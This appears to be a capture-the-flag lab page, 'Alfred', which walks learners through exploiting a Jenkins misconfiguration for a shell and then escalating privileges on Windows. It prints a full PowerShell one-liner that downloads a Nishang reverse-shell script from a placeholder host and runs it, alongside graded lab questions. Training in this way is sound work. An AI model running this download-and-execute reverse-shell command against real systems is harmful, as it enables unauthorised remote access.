Alfred
Premium roomExploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.
easy
45 min
52,444
To access material, start machines and answer questions login.
In this room, we'll learn how to exploit a common misconfiguration on a widely used automation server( - This tool is used to create continuous integration/continuous development that allow developers to automatically deploy their code once they made changes to it). After which, we'll use an interesting privilege escalation method to get full system access.
Since this is a Windows application, we'll be using Nishang (opens in new tab) to gain initial access. The repository contains a useful set of scripts for initial access, enumeration and privilege escalation. In this case, we'll be using the reverse shell scripts (opens in new tab).
Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.
How many ports are open? (TCP only)
What is the username and password for the login panel? (in the format username:password)
Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it: powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
You first need to download the Powershell script and make it available for the server to download. You can do this by creating an http server with python: python3 -m http.server
What is the user.txt flag?
Ready to learn Cyber Security?
The Alfred room is only available for premium users. Signup now to access more than 500 free rooms and learn cyber security through a fun, interactive learning environment.
Already have an account? Log in